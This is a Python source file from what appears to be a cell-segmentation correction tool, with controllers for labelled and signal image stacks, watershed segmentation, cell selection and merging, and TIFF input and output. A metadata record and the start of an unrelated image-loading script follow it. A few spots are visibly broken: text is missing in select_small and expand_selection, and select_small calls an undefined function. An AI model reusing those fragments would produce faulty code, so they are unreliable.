\n\n vb = [ [ 0.0, 0.0, 0.0, 0.0+dx, 0.0+dy, 0.0+dz],\n [ tl[0], 0.0, 0.0, 1.0-dx, 0.0+dy, 0.0+dz],\n [ 0.0, tl[1], 0.0, 0.0+dx, 1.0-dy, 0.0+dz],\n [ tl[0], tl[1], 0.0, 1.0-dx, 1.0-dy, 0.0+dz],\n [ 0.0, 0.0, tl[2], 0.0+dx, 0.0+dy, 1.0-dz],\n [ tl[0], 0.0, tl[2], 1.0-dx, 0.0+dy, 1.0-dz],\n [ 0.0, tl[1], tl[2], 0.0+dx, 1.0-dy, 1.0-dz],\n [ tl[0], tl[1], tl[2], 1.0-dx, 1.0-dy, 1.0-dz] ]\n\n\n vb = np.array(vb, dtype=np.float32)\n vb = vb.flatten()\n \n idx_out = np.array([[0, 2, 1], [2, 3, 1],\n [1, 4, 0], [1, 5, 4],\n [3, 5, 1], [3, 7, 5],\n [2, 7, 3], [2, 6, 7],\n [0, 6, 2], [0, 4, 6],\n [5, 6, 4], [5, 7, 6]]\n , dtype=np.uint32) \n\n \n sc = 1.0/la.norm(tl)\n c = 0.5*tl\n\n\n o.transform = np.array(( (sc, 0.0, 0.0, -sc*c[0]), (0.0, sc, 0.0, -sc*c[1]), (0.0, 0.0, sc, -sc*c[2]), (0.0, 0.0, 0.0, 1.0)))\n\n o.tex_transform = np.array( (((1.0-2*dx)/tl[0], 0.0, 0.0, dx), \n ( 0.0, (1.0-2*dy)/tl[1], 0.0, dy),\n ( 0.0, 0.0, (1.0-2*dz)/tl[2], dz),\n ( 0.0, 0.0, 0.0, 1.0) ))\n\n o.orig_vb = np.array(vb)\n o.orig_idx = idx_out\n \n return o\n\ndef make_stack_label_obj(stack, spacing):\n o = Obj()\n o.shape = stack.shape\n o.spacing = spacing\n return o\n\ndef make_stack_obj(stacks, spacing):\n o = Obj()\n o.shape = stacks[0].shape\n o.spacing = spacing\n return o\n\n\n\nclass StackController(object):\n def __init__(self, stack, spacing):\n self.stack = stack\n self.spacing = spacing\n self.update_callbacks = []\n\n \n def apply_clip_planes(self, clip_planes):\n self.set_stack(apply_clip_planes(clip_planes, self.stack))\n\n def set_stack(self, s):\n self.stack = s\n \n def update(self, msg=None):\n for f in self.update_callbacks:\n f(msg)\n\n\n\nclass LabelledStackController(StackController):\n def __init__(self, stack, spacing, img_data=None, orig_shape=None, autosave_dir=None):\n self.labelled_stack = LabelledStack(stack, spacing, img_data)\n self.spacing = spacing\n self.selected = []\n self.update_callbacks = []\n self.omitted = []\n self.stack_updated = False\n if orig_shape is not None:\n self.orig_shape = orig_shape\n else:\n self.orig_shape = stack.shape\n self.autosave_dir = autosave_dir\n self.autosave_idx = 0\n\n\n\n def get_state(self):\n return blosc.pack_array(self.labelled_stack.labels, cname='lz4'), copy.deepcopy((self.labelled_stack.celltypes, self.labelled_stack.cell_props, self.selected, self.omitted, self.spacing, self.orig_shape))\n\n def set_state(self, state):\n (self.labelled_stack.labels, self.labelled_stack.celltypes, self.labelled_stack.cell_props, self.selected, self.omitted, self.spacing, self.orig_shape) = (blosc.unpack_array(state[0]),) + state[1]\n self.update_cells()\n self.update()\n\n \n \n def update(self, msg=None):\n StackController.update(self, msg)\n print('as', self.autosave_dir)\n if self.autosave_dir and msg!='selected':\n self.write_celltypes(self.autosave_dir + '/'+str(self.autosave_idx)+'.csv')\n self.write_tiff(self.autosave_dir + '/'+str(self.autosave_idx)+'.tif')\n self.autosave_idx = (self.autosave_idx+1)%10\n \n def update_cells(self):\n self.labelled_stack.update_cells()\n # save_cell_props\n\n def add_seed(self, v, r=1, use_selected=False):\n print(v)\n s = self.stack\n shape = s.shape\n if not use_selected or not self.selected:\n new_idx = np.max(self.stack)+ 1\n else:\n new_idx = self.selected[0]\n print('new_idx', new_idx)\n s[min(shape[0]-1,max(0,v[0]-r)):min(shape[0],v[0]+r+1),\n min(shape[1]-1,max(0,v[1]-r)):min(shape[1],v[1]+r+1),\n min(shape[2]-1,max(0,v[2]-r)):min(shape[2],v[2]+r+1)] = new_idx\n# print (min(shape[0],max(0,v[0]-r)), min(shape[0],v[0]+r+1))\n self.labelled_stack.celltypes[new_idx] = 0\n for p in self.labelled_stack.cell_props.values():\n p[new_idx] = 0\n self.update_cells()\n self.update()\n\n def classify_seg(self, other_labels):\n celltypes = self.labelled_stack.celltypes\n A = self.stack\n matching_cells, best_IoU = eval_seg.matching_IoU(A, other_labels, threshold=0.75, return_best=True)\n under_seg, acme = eval_seg.calc_acme_criterion(A, other_labels, threshold=0.5, return_criterion=True)\n under_seg = set(under_seg) - set(matching_cells)\n\n l = np.unique(A)\n print(best_IoU)\n for i in l:\n if i in matching_cells:\n celltypes[i] = 0\n elif i in under_seg:\n celltypes[i] = 1\n else:\n celltypes[i] = 2\n print(celltypes)\n self.update()\n\n def split_cc(self):\n new = skimage.measure.label(self.stack)\n self.labelled_stack.set_stack(new)\n self.labelled_stack.celltypes = {} #dict((i, 0) for i in np.unique(new))\n self.update_cells()\n self.update()\n \n def update_signal(self, stack):\n self.labelled_stack.update_img_data(stack)\n \n def write_tiff(self, fn):\n s = self.orig_shape\n write_tiff(fn, self.stack[:s[0], :s[1], :s[2]].astype(np.uint16), self.spacing)\n\n def set_omitted(self, omitted):\n self.omitted = omitted\n \n def update_selected(self):\n self.update('selected')\n\n def get_selected(self):\n return list(self.selected)\n\n def get_label_point(self, p):\n if self.stack.shape[0]>1:\n return self.stack[tuple(p)]\n else:\n return self.stack[(0,)+tuple(p[1:])]\n \n def gen_colmap(self, prop_name=None, celltypes=False, omitted=[], ct_weight=0.6, grey_labels=False):\n return self.labelled_stack.gen_colmap(prop_name, celltypes, self.selected, self.omitted, ct_weight, grey_labels)\n \n @property\n def stack(self):\n return self.labelled_stack.labels\n\n def set_stack(self, s):\n self.labelled_stack.set_stack(s)\n self.update_cells()\n self.update()\n\n def dilate_labels(self):\n s = self.stack\n s = nd.grey_dilation(s, size=(3,3,3))\n self.set_stack(s)\n self.update_cells()\n \n \n def get_cell_props(self):\n return self.labelled_stack.cell_props\n \n def calc_mean_signal(self, signal):\n self.labelled_stack.calc_mean_signal(signal)\n\n def calc_min_signal(self, signal):\n self.labelled_stack.calc_min_interior_signal(signal)\n\n def calc_mean_interior_signal(self, signal):\n self.labelled_stack.calc_mean_interior_signal(signal)\n\n def make_borders(self):\n return self.labelled_stack.make_borders()\n \n #TODO\n \n def select_by_prop(self, cond):\n props = self.get_cell_props()\n percentile_props = {}\n prop_names = list(props)\n for p in props:\n prop = props[p]\n mean_v = np.mean(props[p].values())\n percentile_props[p] = dict((i, prop[i]/ mean_v) for i in prop)\n\n selected = []\n for i in self.labelled_stack.cell_props[prop_names[0]]:\n v = eval(cond, {}, dict((p, percentile_props[p][i]) for p in prop_names))\n if v:\n selected.append(i)\n self._set_selected(selected)\n\n\n def write_celltypes(self, fn):\n celltypes = self.labelled_stack.celltypes\n with open(fn, 'w') as csvfile:\n writer = csv.writer(csvfile)\n for (i,v) in celltypes.items():\n writer.writerow((i,v))\n\n def get_celltypes(self):\n return self.labelled_stack.celltypes\n \n def read_celltypes(self, fn):\n celltypes = self.labelled_stack.celltypes\n with open(fn, 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if len(row)>1:\n celltypes[int(row[0])] = int(row[1])\n self.update()\n\n \n def set_celltype(self, ct):\n for i in self.selected:\n self.labelled_stack.celltypes[i] = ct\n self.update()\n\n \n def select_small(self, large):\n labels, counts = np.unique(self.stack, return_counts=True)\n mean_area = np.mean(counts)\n self._set_selected(labels[countssmall*mean_area].tolist())\n\n \n def select_neighbours(self):\n ls = self.labelled_stack\n A = ls.get_mean_bdd_connectivity()\n\n selected = list(set(itertools.chain.from_iterable(A.indices[A.indptr[i]:A.indptr[i+1]] for i in self.selected)) - set(self.selected))\n if 0 in selected:\n selected.remove(0)\n\n self._set_selected(selected)\n\n \n def write_cell_graph(self, fn):\n self.labelled_stack.write_cell_graph(fn)\n\n \n def merge_watershed(self, level):\n return self.labelled_stack.merge_watershed(level)\n\n \n def expand_selection(self, threshold):\n ls = self.labelled_stack\n A = ls.get_mean_bdd_connectivity()\n threshold = float(threshold)*np.mean(A.data)\n\n selected = list(set(itertools.chain(itertools.chain.from_iterable(A.indices[A.indptr[i]:A.indptr[i+1]][A.data[A.indptr[i]:A.indptr[i+1]]large*mean_area)]\n\n print('bad_labels', bad_labels)\n self._delete_cells(bad_labels)\n self.update()\n \n def merge_selected(self):\n selected = sorted(self.selected)\n if not selected:\n return\n min_selected = selected[0]\n self.stack.flat[np.in1d(self.stack.flat, self.selected)] = min_selected\n \n if 'area' in self.labelled_stack.cell_props:\n new_area = sum(self.labelled_stack.cell_props['area'][i] for i in selected)\n self.labelled_stack.cell_props['area'][selected[0]] = new_area\n self._delete_cells(selected[1:])\n self.selected = [selected[0]]\n print('up')\n self.update()\n \n\n def _delete_cells(self, cells):\n # Fix up selection\n for i in cells:\n if i in self.labelled_stack.celltypes:\n del self.labelled_stack.celltypes[i]\n for p in self.labelled_stack.cell_props.values():\n if i in p:\n del p[i]\n\n self._set_selected(list(set(self.selected) - set(cells)))\n\n def select_by_celltype(self, ct):\n selected = [i for i,v in self.labelled_stack.celltypes.items() if v in ct] \n self._set_selected(selected)\n \n def set_omitted(self, ct_list):\n self.omitted = ct_list\n self.update()\n\n \n def set_selected(self, selected):\n self._set_selected(selected)\n\n def _set_selected(self, selected):\n self.selected = selected\n self.update_selected()\n\n\n \n def delete_selected(self):\n self.stack.flat[np.in1d(self.stack.flat, self.selected)] = 0\n self._delete_cells(self.selected)\n self.update()\n \nclass PointMarkerCollectionController(object):\n def __init__(self):\n self.points = []\n \n def add_points(self, points):\n self.points += points\n\n def add_point_label(self, x):\n self.points.append(x)\n \n\n \n \nclass SignalStackController(StackController):\n\n def write_tiff(self, fn):\n write_tiff(fn, self.stack.astype(np.float32), self.spacing)\n\n def blur_stack(self, radius):\n self.stack = itk_blur_stack(self.stack, self.spacing, radius)\n self.update()\n \n def apply_power(self, power):\n self.stack = np.power(self.stack, power)\n self.update()\n\n def flip_z(self):\n self.stack = np.ascontiguousarray(self.stack[::-1,:,:])\n self.update()\n\n def equalize_stack(self):\n self.stack = equalize(self.stack)\n self.update()\n\n def invert(self):\n self.stack = np.max(self.stack) - self.stack\n self.update()\n\n def grey_closing(self, radius):\n self.stack = nd.grey_closing(self.stack, radius)\n\n def paint(self, p):\n# self.stack[tuple(p)] = 1.0\n self.last_paint = tuple(p)[1:]\n self.update()\n\n def clahe(self):\n self.stack[0,:,:] = skimage.exposure.equalize_adapthist(self.stack[0,:,:], 16)\n\n def aniso(self):\n signal = sitk.GetImageFromArray(self.stack)\n signal = sitk.GradientAnisotropicDiffusion(signal)\n self.stack = sitk.GetArrayFromImage(signal)\n self.update()\n\n def subtract_bg(self):\n self.stack = np.clip(self.stack - nd.gaussian_filter(self.stack, 20), 0, 1)\n self.update()\n \n\n def paint_to(self, p):\n rr, cc = line(self.last_paint[0], self.last_paint[1], p[1], p[2])\n self.stack[p[0],rr,cc] = 1.0\n self.last_paint = tuple(p)[1:]\n self.update()\n\n \nclass WorldController(object):\n def __init__(self, log=None, spacing=None, autosave_dir=None):\n self.all_label_controllers = {}\n self.all_signal_controllers = {}\n self.active_signal = None\n self.active_label = None\n self.autosave_dir = autosave_dir\n self.update_callbacks = []\n self.spacing = spacing\n self.log = log\n self.undo_stack = collections.deque([], maxlen=100)\n self.log_stack = []\n self.stack_shape = None\n self.view = None\n\n\n def replay_log(self, filename):\n with open(filename, 'r') as f:\n for l in f:\n print('REPLAY COMMAND :', l)\n func_name, args, kwargs = eval(l, {'array':np.array, 'float32':np.float32})\n try:\n y = getattr(self, func_name)\n \n w = self.wc\n y = getattr(w, func_name)\n except AttributeError:\n pass\n\n y(*args, **kwargs)\n self.update()\n\n \n def undo(self):\n self.log.write('[\"undo\",(),{}]\\n')\n print(self.undo_stack)\n if self.undo_stack and self.undo_stack[-1] != False:\n action = self.undo_stack.pop()\n action()\n\n def repeat(self):\n if self.log_stack:\n action = self.log_stack[-1]\n print('REPEAT', action)\n action()\n\n \n def set_stack_shape(self, shape):\n self.stack_shape = shape\n if self.view:\n self.view.make_stack_obj()\n \n \n def update(self, msg=None):\n for f in self.update_callbacks:\n f(msg)\n\n def update_signal(self, *msg):\n l = self.active_label\n s = self.active_signal\n if l is not None:\n self.get_label_controller().update_signal(self.get_signal_stack)\n\n\n def update_label(self, *msg):\n pass\n \n def get_spacing(self):\n if self.spacing is not None:\n return self.spacing\n else:\n return (1.0, 1.0, 1.0)\n\n \n def get_label_controller(self):\n if self.active_label is not None:\n return self.all_label_controllers[self.active_label]\n else:\n return None\n \n def get_label_stack(self):\n if self.active_label is not None:\n return self.all_label_controllers[self.active_label].stack\n else:\n return np.zeros(self.stack_shape, dtype=np.int32)\n \n\n \n def get_signal_controller(self):\n return self.all_signal_controllers[self.active_signal]\n\n def get_signal_stack(self):\n if self.active_signal is not None:\n return self.all_signal_controllers[self.active_signal].stack\n else:\n return np.zeros(self.stack_shape, dtype=np.float32)\n\n def get_all_signal_stacks(self):\n return [c.stack for c in self.all_signal_controllers.values()]\n\n \n\n @undo_label\n def add_seed(self, v, use_selected=False):\n if self.active_label is None:\n self.make_empty_labels()\n print(self.active_label)\n self.get_label_controller().add_seed(v, use_selected=use_selected)\n \n\n\n @undo_label\n def seed_minima(self, r=2):\n if self.active_label is None:\n self.make_empty_labels()\n signal = self.get_signal_stack()\n labels = self.get_label_stack()\n b_signal = signal #.astype(np.float32)\n b_signal = nd.gaussian_filter(b_signal, r)\n\n nbd = nd.generate_binary_structure(len(b_signal.shape),2)\n minima = (b_signal==nd.minimum_filter(b_signal, footprint=nbd))\n \n minima = nd.binary_dilation(minima, structure=np.ones((3,3,3)))\n m_labels, nl = nd.label(minima)\n print('labels shape', m_labels.shape, nl)\n \"\"\"\n #labels[m_labels>0] = m_labels[m_labels>0]+np.max(labels)\n labels = m_labels\n minima = signal>np.mean(signal)\n \"\"\"\n self.get_label_controller().set_stack(m_labels.astype(np.int32)) \n\n \n def watershed_from_labels(self, slice_z=None, mask_celltypes=True):\n celltypes = self.get_label_controller().labelled_stack.celltypes\n \n\n labels = self.get_label_stack()\n print('labels dtype', labels.dtype)\n N = np.max(labels)+1\n signal = self.get_signal_stack()\n if signal.shape[0]>labels.shape[0]:\n signal = signal[slice_z:slice_z+1,:,:]\n\n if mask_celltypes: \n mask_cells = np.array([celltypes.get(i, 0)>0 for i in range(N)])\n mask = mask_cells[labels]\n old_labels = np.array(labels)\n labels[mask] = 0\n signal = np.array(signal)\n signal[mask] = 1\n signal = sitk.GetImageFromArray(signal)\n labels = sitk.GetImageFromArray(labels.astype(np.int32))\n labels = sitk.MorphologicalWatershedFromMarkers(signal, labels, markWatershedLine = False)\n labels = sitk.GetArrayFromImage(labels)\n if mask_celltypes:\n labels = np.where(mask, old_labels, labels)\n self.get_label_controller().set_stack(labels.astype(np.int32))\n\n\n @undo_label\n def resegment(self):\n\n lc = self.get_label_controller()\n labels = np.array(self.get_label_stack())\n selected = lc.get_selected()\n \n N = np.max(labels)+1\n signal = np.array(self.get_signal_stack())\n s_max = np.max(signal)\n\n mask = np.isin(labels, selected)\n mask = nd.binary_fill_holes(mask)\n\n obj = nd.find_objects(mask)\n if not obj:\n return\n sl = obj[0]\n\n labels = labels[sl]\n signal = signal[sl]\n mask = mask[sl]\n \n labels[~mask] = 0\n signal[~mask] = s_max\n for i in selected:\n labels[labels==i] = 0\n \n signal = sitk.GetImageFromArray(signal)\n labels = sitk.GetImageFromArray(labels.astype(np.int32))\n labels = sitk.MorphologicalWatershedFromMarkers(signal, labels, markWatershedLine = False)\n new_labels = sitk.GetArrayFromImage(labels)\n\n labels = self.get_label_stack()\n labels[sl] = np.where(mask, new_labels, labels[sl])\n self.get_label_controller().set_stack(labels.astype(np.int32))\n\n\n @undo_label\n def split_plane(self):\n\n lc = self.get_label_controller()\n labels = np.array(self.get_label_stack())\n selected = lc.get_selected()\n if len(selected)!=1:\n return\n \n N = np.max(labels)+1\n signal = np.array(self.get_signal_stack())\n s_max = np.max(signal)\n\n mask = np.isin(labels, selected)\n mask = nd.binary_fill_holes(mask)\n\n obj = nd.find_objects(mask)\n if not obj:\n return\n sl = obj[0]\n \n labels = labels[sl]\n mask = mask[sl]\n \n labels[~mask] = 0\n\n labels[labels==selected[0]] = 0\n\n cells = np.unique(labels)\n\n cm = nd.center_of_mass(np.ones_like(labels), labels, cells[1:])\n if len(cm)<3:\n return\n\n c_i, c_j, c_k = cm[0]\n\n n_i, n_j, n_k = np.cross(np.array(cm[1])-np.array(cm[0]), np.array(cm[2])-np.array(cm[0]))\n \n s = labels.shape\n i, j, k = np.ogrid[:s[0], :s[1], :s[2]]\n mask2 = ((i-c_i)*n_i + (j-c_j)*n_j + (k-c_k)*n_k >0)*mask\n\n new_labels = mask*selected[0]\n new_labels[mask2] = cells[1]\n\n \n labels = self.get_label_stack()\n labels[sl] = np.where(mask, new_labels, labels[sl])\n self.get_label_controller().set_stack(labels.astype(np.int32))\n\n\n \n\n @undo_label\n def rw_from_labels(self, beta=100):\n signal = self.get_signal_stack()\n labels = self.get_label_stack()\n result = random_walker(signal, labels, beta=beta, mode='cg_mg', use_gradient=False)\n self.get_label_controller().set_stack(result)\n\n @log\n def watershed_no_labels(self, sigma=1.0, h=1.0):\n if self.active_label is None:\n self.make_empty_labels()\n s = self.get_signal_stack()\n signal = sitk.GetImageFromArray(255*(s/float(np.max(s))))\n if sigma>0:\n signal = sitk.DiscreteGaussian(signal, sigma)\n signal = sitk.Cast(signal, sitk.sitkInt16) \n labels = sitk.MorphologicalWatershed(signal, level=h, markWatershedLine = False, fullyConnected=False)\n labels = sitk.GetArrayFromImage(labels)\n lc = self.get_label_controller()\n lc.set_stack(labels.astype(np.int32))\n lc.update_cells()\n\n def get_signal_names(self):\n return self.all_signal_controllers.keys()\n\n def get_label_names(self):\n return self.all_label_controllers.keys()\n\n @undo_signal\n def apply_clip_planes_signal(self, clip_planes):\n self.get_signal_controller().apply_clip_planes(clip_planes)\n\n @undo_signal\n def apply_clip_planes_labels(self, clip_planes):\n self.get_label_controller().apply_clip_planes(clip_planes)\n\n\n @undo_label\n def classify_seg(self, other_name):\n self.get_label_controller().classify_seg(self.all_label_controllers[other_name].stack)\n \n @log\n def copy_signal_stack(self):\n stack_name = 'img'+str(len(self.all_signal_controllers)+1)\n\n u = np.array(self.get_signal_stack())\n \n self._add_signal(stack_name, u)\n self._select_active_signal(stack_name)\n\n self.update()\n\n\n @log\n def copy_label_stack(self):\n stack_name = 'label'+str(len(self.all_label_controllers)+1)\n\n u = np.array(self.get_label_stack())\n \n self._add_label(stack_name, u)\n self._select_active_label(stack_name)\n\n self.update()\n\n\n \n @log\n def select_active_signal(self, stack_name):\n self._select_active_signal(stack_name)\n self.update()\n \n def _select_active_signal(self, stack_name):\n self.active_signal = stack_name\n\n\n @log\n def select_active_label(self, label_name):\n self._select_active_label(label_name)\n self.update()\n \n def _select_active_label(self, label_name):\n self.active_label = label_name\n\n \n def _add_signal(self, new_name, new_signal):\n self.all_signal_controllers[new_name] = SignalStackController(new_signal, self.spacing)\n self.all_signal_controllers[new_name].update_callbacks.append(self.update_signal)\n\n def _add_label(self, new_name, new_label, orig_shape=None):\n if self.active_signal is None:\n self.all_label_controllers[new_name] = LabelledStackController(new_label, self.spacing, None, orig_shape=orig_shape, autosave_dir = self.autosave_dir)\n else:\n self.all_label_controllers[new_name] = LabelledStackController(new_label, self.spacing, self.get_signal_stack(), orig_shape=orig_shape, autosave_dir = self.autosave_dir)\n self.all_label_controllers[new_name].update_callbacks.append(self.update_label)\n self.all_label_controllers[new_name].update_callbacks.append(self.update)\n\n\n\n @log\n def load_signal(self, filename, img_dir=False):\n stack_name = 'img'+str(len(self.all_signal_controllers)+1)\n #\n def round_up(i, c):\n return i + (c-i%c)%c\n\n def process(s):\n s = np.abs(s)\n ext_shape = tuple( [ round_up(i, 16) for i in s.shape ])\n tmp = np.zeros(ext_shape, dtype = s.dtype)\n tmp[:s.shape[0], :s.shape[1], :s.shape[2]] = s\n return tmp\n\n if img_dir:\n u, spacing = load_image_dir(filename, 0)\n spacing = np.array(spacing)\n elif 'png' in filename:\n u, spacing = load_png(filename)\n spacing = np.array(spacing)\n else:\n u, spacing = load_tiff(filename, 0)\n spacing = np.array(spacing)\n\n if self.spacing is None:\n self.spacing = spacing\n \n# u = process(u).astype(np.float32)\n u = u.astype(np.float32)\n\n u = (u/np.max(u)).astype(np.float32)\n\n if self.stack_shape is None:\n self.set_stack_shape(u.shape)\n\n \n self._add_signal(stack_name, u)\n self._select_active_signal(stack_name)\n\n self.update()\n\n\n @log\n def load_signal_rgb(self, filename, img_dir=False):\n stack_name = 'img'+str(len(self.all_signal_controllers)+1)\n #\n def round_up(i, c):\n return i + (c-i%c)%c\n\n def process(s):\n s = np.abs(s)\n ext_shape = tuple( [ round_up(i, 16) for i in s.shape ])\n tmp = np.zeros(ext_shape, dtype = s.dtype)\n tmp[:s.shape[0], :s.shape[1], :s.shape[2]] = s\n return tmp\n\n if img_dir:\n u, spacing = load_image_dir(filename, 0)\n spacing = np.array(spacing)\n elif 'png' in filename:\n u, spacing = load_png_rgb(filename)\n spacing = np.array(spacing)\n else:\n u, spacing = load_tiff(filename, 0)\n spacing = np.array(spacing)\n\n if self.spacing is None:\n self.spacing = spacing\n \n\n# u = process(u).astype(np.float32)\n\n for i in range(u.shape[0]):\n v = u[i,:,:,:].astype(np.float32)\n\n v = (v/np.max(v)).astype(np.float32)\n\n if self.stack_shape is None:\n self.set_stack_shape(v.shape)\n self._add_signal(stack_name+'-'+['r','g','b'][i], v)\n \n self._select_active_signal(stack_name+'-r')\n\n self.update()\n \n\n @log\n def make_empty_labels(self, label_name=None):\n if label_name is None:\n label_name = 'label'+str(len(self.all_label_controllers)+1)\n #\n\n u = self.get_label_stack()\n\n if self.stack_shape is None:\n self.set_stack_shape(u.shape)\n\n self._add_label(label_name, u, orig_shape = u.shape)\n self._select_active_label(label_name)\n self.update()\n\n\n \n @log\n def load_label(self, filename, img_dir=False, label_name=None, remap=False):\n if label_name is None:\n label_name = 'label'+str(len(self.all_label_controllers)+1)\n #\n\n def round_up(i, c):\n return i + (c-i%c)%c\n\n def process(s):\n s = np.abs(s)\n ext_shape = tuple( [ round_up(i, 16) for i in s.shape ])\n tmp = np.zeros(ext_shape, dtype = s.dtype)\n tmp[:s.shape[0], :s.shape[1], :s.shape[2]] = s\n return tmp\n\n if img_dir or '%' in filename:\n u, spacing = load_image_dir_labels(filename, 0)\n remap=True\n elif 'png' in filename:\n u, spacing = load_png_labels(filename)\n remap = True\n else:\n u, spacing = load_tiff(filename, 0)\n\n\n\n if len(u.shape)==4:\n u = 256*256*u[:,:,:,0]+256*u[:,:,:,1] + u[:,:,:,2] # RGB labelled images\n\n \n orig_shape = u.shape\n\n if u.dtype==np.int32:\n u=u.astype(np.uint32)\n \n # REMAP\n\n shape = u.shape\n if remap:\n l, u = np.unique(u, return_inverse=True)\n u = u.reshape(shape)\n\n spacing = np.array(spacing)\n if self.spacing is None:\n self.spacing = spacing\n \n# u = process(u)\n \n if self.stack_shape is None:\n self.set_stack_shape(u.shape)\n\n self._add_label(label_name, u, orig_shape = orig_shape)\n self._select_active_label(label_name)\n\n\n self.update()\n\n \n\n \n @undo_label\n def delete_selected(self):\n self.get_label_controller().delete_selected()\n\n\n @undo_no_log\n def write_label_tiff(self, fn):\n self.get_label_controller().write_tiff(fn)\n\n @undo_no_log\n def write_celltypes(self, fn):\n self.get_label_controller().write_celltypes(fn)\n\n\n @undo_label\n def read_celltypes(self, fn):\n self.get_label_controller().read_celltypes(fn)\n self.update()\n \n @undo_no_log\n def write_signal_tiff(self, fn):\n self.get_signal_controller().write_tiff(fn)\n\n @undo_no_log\n def write_mask_tiff(self, fn):\n self.get_mask_controller().write_tiff(fn)\n\n\n\n def get_selected(self):\n c = self.get_label_controller()\n if c:\n return c.get_selected()\n else:\n return []\n\n\n def get_celltypes(self):\n c = self.get_label_controller()\n if c:\n return c.get_celltypes()\n else:\n return {}\n \n def gen_colmap(self, prop_name=None, celltypes=False, omitted=[], ct_weight=0.6, grey_labels=False):\n lc = self.get_label_controller()\n if lc:\n return lc.gen_colmap(prop_name, celltypes, omitted, ct_weight, grey_labels)\n else:\n return np.zeros((256,3), dtype=np.float32)\n\n \n\n def gen_volume_colmap(self):\n lc = self.get_label_controller()\n# print 'gen_volume_colmap', lc\n if lc:\n# print '>', lc.gen_colmap(celltypes=True, ct_weight=0.0, grey_labels=False)\n# print '>>'\n return lc.gen_colmap(celltypes=True, ct_weight=0.0, grey_labels=False)\n else:\n return np.zeros((256,3), dtype=np.float32)\n\n \n def get_cell_props(self):\n return self.get_label_controller().get_cell_props()\n\n \n @undo_selected\n def select_by_prop(self, cond):\n self.get_label_controller().select_by_prop(cond)\n self.update()\n\n \n @undo_label\n def set_celltype(self, ct):\n self.get_label_controller().set_celltype(ct)\n \n @undo_selected\n def select_small(self, large):\n old_selected = self.get_label_controller().get_selected()\n def undo():\n self.get_label_controller().set_selected(old_selected)\n\n self.get_label_controller().select_large(small)\n\n \n @undo_selected\n def select_neighbours(self):\n old_selected = self.get_label_controller().get_selected()\n def undo():\n self.get_label_controller().set_selected(old_selected)\n\n self.get_label_controller().select_neighbours()\n\n \n @undo_no_log\n def write_cell_graph(self, fn):\n self.get_label_controller().write_cell_graph(fn)\n \n @log\n def merge_watershed(self, level, new_name=None):\n \n if new_name is None:\n new_name = 'merge-'+str(len(self.all_label_controllers)+1)\n\n new_label = self.get_label_controller().merge_watershed(level)\n self._add_label(new_name, new_label)\n self._select_active_label(new_name)\n\n self.update()\n \n @log\n def make_borders(self):\n new_name = 'borders'+self.active_label\n borders = self.get_label_controller().make_borders()\n self._add_signal(new_name, borders)\n self._select_active_signal(new_name)\n self.update()\n\n @undo_selected\n def expand_selection(self, threshold):\n self.get_label_controller().expand_selection(threshold)\n\n \n @undo_selected\n def select(self, v):\n self.get_label_controller().select(v)\n\n \n @undo_selected\n def add_selected(self, v):\n self.get_label_controller().add_selected(v)\n #self.update('selected')\n\n @undo_selected\n def include_selected(self, v):\n s = self.get_label_controller().include_selected(v)\n if s:\n return True\n return False\n \n @undo_label\n def split_cc(self):\n self.get_label_controller().split_cc()\n\n @undo_label\n def merge_selected(self):\n self.get_label_controller().merge_selected()\n \n \n @undo_label\n def delete_selected(self):\n self.get_label_controller().delete_selected()\n \n @undo_label\n def remove_small_large_cells(self, small, large):\n self.get_label_controller().remove_small_large_cells(small, large)\n \n @undo_selected\n def select_by_celltype(self, ct):\n self.get_label_controller().select_by_celltype(ct)\n\n\n @undo_label\n def split_cell(self):\n selected = self.get_label_controller().get_selected()\n self.get_label_controller().split_cell(self.get_signal_stack(), selected[0])\n\n\n @undo_label\n def dilate_labels(self):\n self.get_label_controller().dilate_labels()\n \n @undo_label\n def set_omitted(self, ct_list):\n self.get_label_controller().set_omitted(ct_list)\n \n @undo_selected\n def set_selected(self, selected):\n self.get_label_controller().set_selected(selected)\n #self.update('selected')\n \n \n \n @undo_signal\n def blur_stack(self, radius):\n self.get_signal_controller().blur_stack(radius)\n\n @undo_signal\n def grey_closing(self, radius):\n self.get_signal_controller().grey_closing(radius)\n \n\n @undo_signal\n def subtract_bg(self):\n self.get_signal_controller().subtract_bg()\n\n @undo_signal\n def aniso(self):\n self.get_signal_controller().aniso()\n\n @undo_signal\n def clahe(self):\n self.get_signal_controller().clahe()\n\n\n @undo_signal\n def invert_signal(self):\n self.get_signal_controller().invert()\n \n\n @undo_signal\n def paint(self, p):\n self.get_signal_controller().paint(p)\n\n @undo_signal\n def paint_to(self, p):\n self.get_signal_controller().paint_to(p)\n\n @undo_signal\n def apply_power(self, power):\n self.get_signal_controller().apply_power(power)\n\n @undo_log\n def flip_z(self):\n def undo():\n self.get_signal_controller().flip_z()\n \n self.get_signal_controller().flip_z()\n return undo, None\n \n @undo_signal\n def equalize_stack(self):\n self.get_signal_controller().equalize_stack()\n \n @undo_label\n def calc_mean_signal(self):\n self.get_label_controller().calc_mean_signal(self.get_signal_stack())\n \n @undo_label\n def calc_min_signal(self):\n self.get_label_controller().calc_min_interior_signal(self.get_signal_stack())\n \n @undo_label\n def calc_mean_interior_signal(self):\n self.get_label_controller().calc_mean_interior_signal(self.get_signal_stack())\n \n def get_label_point(self, p):\n return self.get_label_controller().get_label_point(p)\n\n \n\n\n\n\n\n\n\n\n\n \n\n\n\n","repo_name":"jfozard/segcorrect","sub_path":"src/mini_controller_nogl.py","file_name":"mini_controller_nogl.py","file_ext":"py","file_size_in_byte":40690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"25682621172","text":"import convolutional_neural_network as cnn\r\nimport numpy as np\r\nimport cv2\r\nimport time\r\n\r\nimg_letter = cv2.imread(\"C:\\\\Users\\\\Christoph Feldkirchn\\\\OneDrive - McKinsey & Company\\\\Desktop\\\\Programming\\\\Neural Networks\\\\cnn\\\\679-6796443_letter-t-png-normal-letter-t-transparent.png\")\r\nimg_pan = cv2.imread(\"C:\\\\Users\\\\Christoph Feldkirchn\\\\OneDrive - McKinsey & Company\\\\Desktop\\\\Programming\\\\Neural Networks\\\\cnn\\\\istockphoto-1145618475-612x612.jpg\")\r\n\r\n# loads it in BRG instead of RGB\r\n#img_letter = cv2.cvtColor(img_letter, cv2.COLOR_BGR2RGB)\r\n#img_pan = cv2.cvtColor(img_pan, cv2.COLOR_BGR2RGB)\r\n#convert image to RGB\r\n\r\n#cv2.imshow('something', 